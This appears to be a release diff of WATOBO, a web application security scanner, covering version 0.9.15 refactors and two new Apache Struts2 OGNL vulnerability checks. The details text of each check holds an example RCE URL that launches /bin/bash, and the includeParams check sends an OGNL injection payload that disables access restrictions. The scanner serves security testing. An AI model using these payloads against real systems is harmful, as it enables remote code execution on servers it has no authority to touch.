watobo 0.9.14 → 0.9.15

Sign up to get free protection for your applications and to get access to all the features.
Files changed (47) hide show
  1. data/CHANGELOG.md +29 -0
  2. data/config/interceptor.yml +1 -0
  3. data/lib/watobo/core/active_check.rb +1 -2
  4. data/lib/watobo/core/client_cert_store.rb +47 -0
  5. data/lib/watobo/core/scanner3.rb +124 -88
  6. data/lib/watobo/core/session.rb +52 -47
  7. data/lib/watobo/core.rb +1 -11
  8. data/lib/watobo/gui/chatviewer_frame.rb +5 -3
  9. data/lib/watobo/gui/checkboxtree.rb +59 -14
  10. data/lib/watobo/gui/checks_policy_frame.rb +1 -5
  11. data/lib/watobo/gui/client_cert_dialog.rb +260 -96
  12. data/lib/watobo/gui/conversation_table.rb +7 -1
  13. data/lib/watobo/gui/conversation_table_ctrl2.rb +14 -5
  14. data/lib/watobo/gui/edit_comment.rb +1 -1
  15. data/lib/watobo/gui/main_window.rb +40 -5
  16. data/lib/watobo/gui/manual_request_editor.rb +10 -8
  17. data/lib/watobo/gui/quick_scan_dialog.rb +8 -6
  18. data/lib/watobo/gui/scanner_settings_dialog.rb +1 -0
  19. data/lib/watobo/gui/text_viewer.rb +5 -3
  20. data/lib/watobo/http/cookies/cookies.rb +3 -1
  21. data/lib/watobo/http_socket/agent.rb +1 -1
  22. data/lib/watobo/http_socket/client_socket.rb +409 -98
  23. data/lib/watobo/http_socket/connection.rb +1 -1
  24. data/lib/watobo/http_socket/http_socket.rb +47 -39
  25. data/lib/watobo/interceptor/proxy.rb +41 -212
  26. data/lib/watobo/mixins/httpparser.rb +17 -16
  27. data/lib/watobo/mixins/shapers.rb +3 -7
  28. data/lib/watobo.rb +2 -1
  29. data/modules/active/domino/domino_db.rb +5 -7
  30. data/modules/active/struts2/default_handler_ognl.rb +128 -0
  31. data/modules/active/struts2/include_params_ognl.rb +127 -0
  32. data/modules/passive/ajax.rb +5 -3
  33. data/modules/passive/detect_infrastructure.rb +2 -3
  34. data/modules/passive/dirindexing.rb +8 -6
  35. data/modules/passive/disclosure_emails.rb +13 -14
  36. data/modules/passive/disclosure_ipaddr.rb +13 -13
  37. data/modules/passive/hotspots.rb +6 -4
  38. data/modules/passive/in_script_parameter.rb +25 -19
  39. data/modules/passive/redirectionz.rb +1 -1
  40. data/modules/passive/sap-headers.rb +78 -0
  41. data/modules/passive/xss_dom.rb +5 -3
  42. data/plugins/catalog/catalog.rb +7 -2
  43. data/plugins/crawler/gui/auth_frame.rb +20 -5
  44. data/plugins/crawler/gui/crawler_gui.rb +56 -9
  45. data/plugins/crawler/lib/engine.rb +12 -14
  46. data/plugins/filefinder/dbs/sap.db +157 -0
  47. metadata +23 -2
data/lib/watobo/mixins/shapers.rb CHANGED
@@ -27,13 +27,11 @@ module Watobo#:nodoc: all
27
27
  include Watobo::Constants
28
28
  def replace_post_parm(parm,value)
29
29
  parm_quoted = Regexp.quote(parm)
30
- self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([0-9a-zA-Z\-\._,+<>\%!=]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
30
+ self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([^&]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
31
31
  end
32
32
 
33
33
  def replace_get_parm(parm,value)
34
34
  parm_quoted = Regexp.quote(parm)
35
- # puts "replacing parameter #{parm} with value #{value}"
36
- # self.first.gsub!(/([?&]{0,1})#{parm}=([0-9a-zA-Z\-\._,+<>\%!=]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
37
35
  self.first.gsub!(/([?&]{1})#{parm_quoted}=([^ &]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
38
36
  end
39
37
 
@@ -42,7 +40,6 @@ module Watobo#:nodoc: all
42
40
  end
43
41
 
44
42
  def replaceFileExt(new_file)
45
- # puts "replace element #{new_element}"
46
43
  begin
47
44
  file = new_file.strip
48
45
  file.gsub!(/^\//, "")
@@ -53,9 +50,8 @@ module Watobo#:nodoc: all
53
50
  end
54
51
 
55
52
  def replaceElement(new_element)
56
- # puts "replace element #{new_element}"
57
53
  new_element.gsub!(/^\//, "")
58
- self.first.gsub!(/(.*\/)(.*) (HTTP.*)/i,"\\1#{new_element} \\3")
54
+ self.first.gsub!(/([^\?]*\/)(.*) (HTTP.*)/i,"\\1#{new_element} \\3")
59
55
  end
60
56
 
61
57
  def replaceURL(new_url)
@@ -370,7 +366,7 @@ module Watobo#:nodoc: all
370
366
  begin
371
367
  new_header = "#{header}: #{value}\r\n"
372
368
  self.each_with_index do |h, i|
373
- if h =~ /^#{Regexp.quote(header)}:/
369
+ if h =~ /^#{Regexp.quote(header)}:/i
374
370
  h.replace(new_header)
375
371
  return true
376
372
  end
data/lib/watobo.rb CHANGED
@@ -23,6 +23,7 @@
23
23
  #Encoding: UTF-8
24
24
  require 'rubygems'
25
25
  require 'yaml'
26
+ require 'json'
26
27
  require 'thread'
27
28
  require 'socket'
28
29
  require 'timeout'
@@ -63,7 +64,7 @@ dont_know_why_REQUIRE_hangs = Mechanize.new
63
64
  # @private
64
65
  module Watobo#:nodoc: all #:nodoc: all
65
66
 
66
- VERSION = "0.9.14"
67
+ VERSION = "0.9.15"
67
68
 
68
69
  def self.base_directory
69
70
  @base_directory ||= ""
data/modules/active/domino/domino_db.rb CHANGED
@@ -35,7 +35,7 @@ module Watobo#:nodoc: all
35
35
  :description => "Enumeration of well known Domino DBs.", # description of checkfunction
36
36
  :author => "Andreas Schmidt", # author of check
37
37
  :check_group => AC_GROUP_DOMINO,
38
- :version => "0.9" # check version
38
+ :version => "1.0" # check version
39
39
  )
40
40
 
41
41
  @finding.update(
@@ -69,16 +69,14 @@ module Watobo#:nodoc: all
69
69
 
70
70
  def generateChecks(chat)
71
71
  begin
72
- if chat.request.url.to_s =~ /(.*)\/\w*\.nsf/ then
72
+ # if chat.request.url.to_s =~ /(.*)\/\w*\.nsf/ then
73
73
  @domino_dbs.each do |db|
74
74
  checker = proc{
75
75
  test_request = nil
76
76
  test_response = nil
77
77
  test = chat.copyRequest
78
- line = test.shift
79
- line.gsub!(/(\w*\.nsf.*) (HTTP\/.*)/, "#{db} \\2")
80
- # puts line
81
- test.unshift line
78
+
79
+ test.replaceFileExt db
82
80
 
83
81
  test_request,test_response = doRequest(test,:default => true)
84
82
 
@@ -110,7 +108,7 @@ module Watobo#:nodoc: all
110
108
  }
111
109
  yield checker
112
110
  end
113
- end
111
+ #end
114
112
  rescue => bang
115
113
  puts bang
116
114
  puts "ERROR!! #{Module.nesting[0].name}"
data/modules/active/struts2/default_handler_ognl.rb ADDED
@@ -0,0 +1,128 @@
1
+ # .
2
+ # default_handler_ognl.rb
3
+ #
4
+ # Copyright 2013 by siberas, http://www.siberas.de
5
+ #
6
+ # This file is part of WATOBO (Web Application Tool Box)
7
+ # http://watobo.sourceforge.com
8
+ #
9
+ # WATOBO is free software; you can redistribute it and/or modify
10
+ # it under the terms of the GNU General Public License as published by
11
+ # the Free Software Foundation version 2 of the License.
12
+ #
13
+ # WATOBO is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with WATOBO; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ # .
22
+ # @private
23
+ module Watobo#:nodoc: all
24
+ module Modules
25
+ module Active
26
+ module Struts2
27
+
28
+
29
+ class Default_handler_ognl < Watobo::ActiveCheck
30
+ @@tested_directories = Hash.new
31
+
32
+ threat =<<'EOF'
33
+ A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution
34
+
35
+ Source: http://struts.apache.org/release/2.3.x/docs/s2-016.html
36
+ CVE: CVE-2013-2251
37
+ EOF
38
+
39
+ #
40
+ details =<<'EOD'
41
+ Example for code execution:
42
+ http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
43
+ EOD
44
+
45
+
46
+ measure = "Update Struts2 to version >2.3.15.1"
47
+
48
+ @info.update(
49
+ :check_name => 'Struts2 default handlers', # name of check which briefly describes functionality, will be used for tree and progress views
50
+ :check_group => "Struts",
51
+ :description => "Check for struts2 default handlers which doesn't sanitize parameters.", # description of checkfunction
52
+ :author => "Andreas Schmidt", # author of check
53
+ :version => "1.0" # check version
54
+ )
55
+
56
+ @finding.update(
57
+ :threat => threat, # thread of vulnerability, e.g. loss of information
58
+ :class => "Struts2 - default handlers", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
59
+ :type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
60
+ :rating => VULN_RATING_CRITICAL,
61
+ :measure => measure,
62
+ :details => details
63
+ )
64
+
65
+ def initialize(project, prefs={})
66
+ super(project, prefs)
67
+
68
+ @vuln_handlers = %w( action redirect redirectAction)
69
+
70
+ def reset
71
+ @@tested_directories.clear
72
+ end
73
+
74
+
75
+ end
76
+
77
+
78
+ def generateChecks(chat)
79
+ begin
80
+ #
81
+ path = chat.request.dir
82
+ return true if @@tested_directories.has_key?(path)
83
+
84
+ @@tested_directories[path] = true
85
+ @vuln_handlers.each do |handler|
86
+ checker = proc {
87
+ results = {}
88
+ request = nil
89
+ response = nil
90
+ test_request = chat.copyRequest
91
+
92
+ test_value = '?' + CGI::escape("#{handler}:watobo_%{10000-1}")
93
+
94
+ test_request.replaceElement test_value
95
+
96
+ request, response = doRequest(test_request)
97
+
98
+ if response.headers.select{|h| h =~ /^Location:.*(_9999)/}.length > 0
99
+
100
+ addFinding( request, response,
101
+ :check_pattern => test_value,
102
+ :proof_pattern => "Location:.*_9999",
103
+ :test_item => handler,
104
+ :chat => chat,
105
+ :title => "[#{request.dir}] - #{handler}"
106
+ )
107
+ end
108
+
109
+ [ request, response ]
110
+ }
111
+ yield checker
112
+
113
+ end
114
+
115
+ rescue => bang
116
+ puts bang
117
+ puts bang.backtrace if $DEBUG
118
+ puts "ERROR!! #{Module.nesting[0].name}"
119
+ raise
120
+ end
121
+ end
122
+
123
+ end
124
+
125
+ end
126
+ end
127
+ end
128
+ end
data/modules/active/struts2/include_params_ognl.rb ADDED
@@ -0,0 +1,127 @@
1
+ # .
2
+ # include_params_ognl.rb
3
+ #
4
+ # Copyright 2013 by siberas, http://www.siberas.de
5
+ #
6
+ # This file is part of WATOBO (Web Application Tool Box)
7
+ # http://watobo.sourceforge.com
8
+ #
9
+ # WATOBO is free software; you can redistribute it and/or modify
10
+ # it under the terms of the GNU General Public License as published by
11
+ # the Free Software Foundation version 2 of the License.
12
+ #
13
+ # WATOBO is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with WATOBO; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ # .
22
+ # @private
23
+ module Watobo#:nodoc: all
24
+ module Modules
25
+ module Active
26
+ module Struts2
27
+
28
+
29
+ class Include_params_ognl < Watobo::ActiveCheck
30
+
31
+ threat =<<'EOF'
32
+ A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution
33
+
34
+ Source: http://struts.apache.org/release/2.3.x/docs/s2-013.html
35
+ CVE: CVE-2013-1966
36
+ EOF
37
+
38
+ #
39
+ details =<<'EOD'
40
+ Example for code execution:
41
+ http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
42
+ EOD
43
+
44
+
45
+ measure = "Update Struts2 to version >2.3.14"
46
+
47
+ @info.update(
48
+ :check_name => 'Struts2 includeParams', # name of check which briefly describes functionality, will be used for tree and progress views
49
+ :check_group => "Struts",
50
+ :description => "Check for vulnerable includeParams attribute.", # description of checkfunction
51
+ :author => "Andreas Schmidt", # author of check
52
+ :version => "1.0" # check version
53
+ )
54
+
55
+ @finding.update(
56
+ :threat => threat, # thread of vulnerability, e.g. loss of information
57
+ :class => "Struts2 - includeParams", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
58
+ :type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
59
+ :rating => VULN_RATING_CRITICAL,
60
+ :measure => measure,
61
+ :details => details
62
+ )
63
+
64
+ def initialize(project, prefs={})
65
+ super(project, prefs)
66
+
67
+ end
68
+
69
+
70
+ def generateChecks(chat)
71
+ begin
72
+
73
+ checker = proc {
74
+ results = {}
75
+ request = nil
76
+ response = nil
77
+ test_request = chat.copyRequest
78
+
79
+
80
+ test_value = "%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(INJ),#writer.close())}"
81
+ marks = [ "INJ" , Time.now.to_i.to_s ]
82
+
83
+ inj_str = marks.map{|m| "'#{m}'"}.join("+")
84
+
85
+ test_value.gsub!(/INJ/, inj_str)
86
+
87
+ tparam = Watobo::UrlParameter.new( :name => "watobo", :value => CGI::escape(test_value) )
88
+
89
+ test_request.url.set tparam
90
+ puts test_request.first
91
+
92
+ request, response = doRequest(test_request)
93
+
94
+ if response.respond_to? :body
95
+ unless response.body.nil?
96
+ body = response.body.unpack("C*").pack("C*")
97
+ #puts body
98
+ proof = marks.join
99
+ if response.body.to_s =~ /#{proof}/
100
+ addFinding( request, response,
101
+ :check_pattern => CGI::escape(test_value),
102
+ :proof_pattern => "#{proof}",
103
+ :chat => chat,
104
+ :title => "[includeParams] - #{request.file}"
105
+ )
106
+ end
107
+ end
108
+ end
109
+
110
+ [ request, response ]
111
+ }
112
+ yield checker
113
+
114
+ rescue => bang
115
+ puts bang
116
+ puts bang.backtrace if $DEBUG
117
+ puts "ERROR!! #{Module.nesting[0].name}"
118
+ raise
119
+ end
120
+ end
121
+
122
+ end
123
+
124
+ end
125
+ end
126
+ end
127
+ end
data/modules/passive/ajax.rb CHANGED
@@ -51,18 +51,20 @@ module Watobo#:nodoc: all
51
51
  end
52
52
 
53
53
  def showError(chatid, message)
54
- puts "!!! Error"
54
+ puts "!!! Error #{Module.nesting[0].name}"
55
55
  puts "Chat: [#{chatid}]"
56
56
  puts message
57
57
  end
58
58
 
59
59
  def do_test(chat)
60
60
  begin
61
-
61
+ return false if chat.response.nil?
62
+ return false unless chat.response.has_body?
62
63
  return true unless chat.response.content_type =~ /(text|script)/
63
64
 
64
65
  @fw_patterns.each do |pattern|
65
- if chat.response.body =~ /#{pattern[:pattern]}/i then
66
+ body = chat.response.body.unpack("C*").pack("C*")
67
+ if body =~ /#{pattern[:pattern]}/i then
66
68
  version = $1.strip
67
69
  addFinding(
68
70
  :check_pattern => "#{pattern[:pattern]}",
data/modules/passive/detect_infrastructure.rb CHANGED
@@ -70,10 +70,9 @@ module Watobo#:nodoc: all
70
70
  # puts "body" + chat.response.body.join
71
71
  return if chat.response.nil? or chat.response.body.nil?
72
72
  if chat.response.content_type =~ /text/ then
73
-
73
+ body = chat.response.body.unpack("C*").pack("C*")
74
74
  @pattern_list.each do |pat|
75
-
76
- if chat.response.join =~ /(#{pat[1]})/i then
75
+ if body =~ /(#{pat[1]})/i then
77
76
  # puts "!!! MATCH !!!"
78
77
  match = $1
79
78
  addFinding(
data/modules/passive/dirindexing.rb CHANGED
@@ -61,12 +61,14 @@ module Watobo#:nodoc: all
61
61
  def do_test(chat)
62
62
  begin
63
63
  @pattern_list.each do |pat|
64
- if chat.response.body =~ /(#{pat})/i then
65
- match = $1
66
- addFinding(
67
- :proof_pattern => "#{match}",
68
- :chat => chat,
69
- :title => "/#{chat.request.path}"
64
+ next unless chat.response.has_body?
65
+ body = chat.response.body.unpack("C*").pack("C*")
66
+ if body =~ /(#{pat})/i then
67
+ match = $1
68
+ addFinding(
69
+ :proof_pattern => "#{match}",
70
+ :chat => chat,
71
+ :title => "/#{chat.request.path}"
70
72
  )
71
73
  end
72
74
  end
data/modules/passive/disclosure_emails.rb CHANGED
@@ -45,29 +45,28 @@ module Watobo#:nodoc: all
45
45
  )
46
46
 
47
47
  valid = '[a-zA-Z\d\.+-]+'
48
- @pattern = "#{valid}@#{valid}\\.(#{valid}){2}"
48
+ @pattern = "(#{valid}@#{valid}\\.(#{valid}){2})"
49
49
  @mail_list = []
50
50
  end
51
51
 
52
52
  def do_test(chat)
53
53
  begin
54
54
  # puts "running module: #{Module.nesting[0].name}"
55
+ return false if chat.response.nil?
56
+ return false unless chat.response.has_body?
55
57
  if chat.response.content_type =~ /text/ and not chat.response.content_type =~ /text.csv/ then
56
- if chat.response.each do |line|
57
- if line =~ /(#{@pattern})/ then
58
- match = $1
59
- if not @mail_list.include?(match) then
58
+ body = chat.response.body.unpack("C*").pack("C*")
59
+ body.scan(/#{@pattern}/) { |m|
60
+ match = m.first
61
+ unless @mail_list.include?(match) then
60
62
  @mail_list.push match
61
63
  addFinding(
62
- :proof_pattern => "#{match}",
63
- :chat => chat,
64
- :title => match
65
- )
66
- end
67
- end
68
-
69
- end
70
- end
64
+ :proof_pattern => "#{match}",
65
+ :chat => chat,
66
+ :title => match
67
+ )
68
+ end
69
+ }
71
70
  end
72
71
  rescue => bang
73
72
  # raise
data/modules/passive/disclosure_ipaddr.rb CHANGED
@@ -45,22 +45,25 @@ module Watobo#:nodoc: all
45
45
  )
46
46
 
47
47
  @pattern = '[^\d\.](\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[^(\d\.)]+?'
48
+
48
49
  @known_ips = []
49
50
  end
50
51
 
51
52
  def do_test(chat)
52
53
  begin
53
54
  # puts "running module: #{Module.nesting[0].name}"
55
+ return false if chat.response.nil?
56
+ return false unless chat.response.has_body?
54
57
  if chat.response.content_type =~ /text/ then
55
- if chat.response.each do |line|
56
- if line =~ /#{@pattern}/ then
57
- ip_addr = $1
58
- octets = ip_addr.split('.')
59
- isIP = true
60
- octets.each do |o|
58
+ body = chat.response.body.unpack("C*").pack("C*")
59
+ body.scan(/#{@pattern}/) { |match|
60
+ ip_addr = match.first
61
+ octets = ip_addr.split('.')
62
+ isIP = true
63
+ octets.each do |o|
61
64
  isIP = false if o.to_i > 255
62
- end
63
- if isIP then
65
+ end
66
+ if isIP then
64
67
  title = "IP: #{ip_addr}"
65
68
  dummy = chat.request.site + ":" + ip_addr
66
69
  if not @known_ips.include?(dummy)
@@ -69,11 +72,8 @@ module Watobo#:nodoc: all
69
72
  :title => title)
70
73
  @known_ips.push dummy
71
74
  end
72
- end
73
- end
74
-
75
- end
76
- end
75
+ end
76
+ }
77
77
  end
78
78
  rescue => bang
79
79
  # raise
data/modules/passive/hotspots.rb CHANGED
@@ -54,9 +54,12 @@ module Watobo#:nodoc: all
54
54
  def do_test(chat)
55
55
  begin
56
56
  # puts "running module: #{Module.nesting[0].name}"
57
+ return false if chat.response.nil?
58
+ return false unless chat.response.has_body?
57
59
  if chat.response.content_type =~ /(text|script)/ and chat.response.status !~ /404/ then
58
- if chat.response.each do |chunk|
59
- chunk.split(/\n/).each do |line|
60
+
61
+ body = chat.response.body.unpack("C*").pack("C*")
62
+ body.split(/\n/).each do |line|
60
63
  @pattern_list.each do |ext|
61
64
  if line =~ /([\w%\/\\\.:-]*\.#{ext})[^\w]/ then
62
65
  match = $1
@@ -71,8 +74,6 @@ module Watobo#:nodoc: all
71
74
  @known_functions.push match
72
75
  end
73
76
  end
74
- end
75
- end
76
77
  end
77
78
  end
78
79
  end
@@ -80,6 +81,7 @@ module Watobo#:nodoc: all
80
81
  # raise
81
82
  puts "ERROR!! #{Module.nesting[0].name}"
82
83
  puts bang
84
+ puts bang.backtrace
83
85
  end
84
86
  end
85
87
  end
data/modules/passive/in_script_parameter.rb CHANGED
@@ -48,42 +48,48 @@ module Watobo#:nodoc: all
48
48
  end
49
49
 
50
50
  def showError(chatid, message)
51
- puts "!!! Error"
51
+ puts "!!! Error #{Module.nesting[0].name}"
52
52
  puts "Chat: [#{chatid}]"
53
53
  puts message
54
54
  end
55
55
 
56
56
  def do_test(chat)
57
57
  begin
58
- parm_values = []
59
58
  minlen = 3
60
- return true unless chat.response.content_type =~ /(text|script)/
61
- chat.request.get_parm_names.each do |parm|
62
- pv = Regexp.quote(chat.request.get_parm_value(parm))
63
- parm_values.push pv unless pv.strip.empty? or pv.strip.length < minlen
64
- end
65
- chat.request.post_parm_names.each do |parm|
66
- pv = chat.request.post_parm_value(parm)
67
- parm_values.push pv unless pv.strip.empty? or pv.strip.length < minlen
68
- end
59
+ return true unless chat.response.content_type =~ /(text|script)/
60
+ return true unless chat.response.has_body?
61
+
62
+ parm_list = chat.request.parameters(:data, :url)
63
+ return true if parm_list.empty?
64
+ body = chat.response.body.unpack("C*").pack("C*")
69
65
 
70
- parm_values.each do |parm_value|
71
-
72
- pattern = Regexp.quote(CGI.unescape(parm_value))
73
- if chat.response.body =~ /<script[^<\/]*#{pattern}/i then
66
+ doc = Nokogiri::HTML(body)
67
+ scripts = doc.css('script')
68
+
69
+ parm_list.each do |parm|
70
+ next if parm.value.nil?
71
+ next if parm.value.empty?
72
+ next if parm.value.length <= minlen
73
+
74
+ pattern = Regexp.quote(CGI.unescape(parm.value))
75
+ scripts.each do |script|
76
+ if script.text =~ /#{pattern}/i then
74
77
  # puts "* Found: Parameter within script"
75
78
  addFinding(
76
- :check_pattern => "#{parm_value}",
77
- :proof_pattern => "#{parm_value}",
78
- :chat=>chat,
79
- :title =>"[#{parm_value}] - #{chat.request.path}"
79
+ :check_pattern => "#{parm.value}",
80
+ :proof_pattern => "#{parm.value}",
81
+ :chat=>chat,
82
+ :title =>"[#{parm.value}] - #{chat.request.path}"
80
83
  )
84
+ end
81
85
 
82
86
  end
83
87
  end
84
88
  rescue => bang
85
89
  # raise
86
90
  showError(chat.id, bang)
91
+ #puts bang.backtrace
92
+
87
93
  end
88
94
  end
89
95
 
data/modules/passive/redirectionz.rb CHANGED
@@ -45,7 +45,7 @@ module Watobo#:nodoc: all
45
45
  end
46
46
 
47
47
  def showError(chatid, message)
48
- puts "!!! Error"
48
+ puts "!!! Error #{Module.nesting[0].name}"
49
49
  puts "Chat: [#{chatid}]"
50
50
  puts message
51
51
  end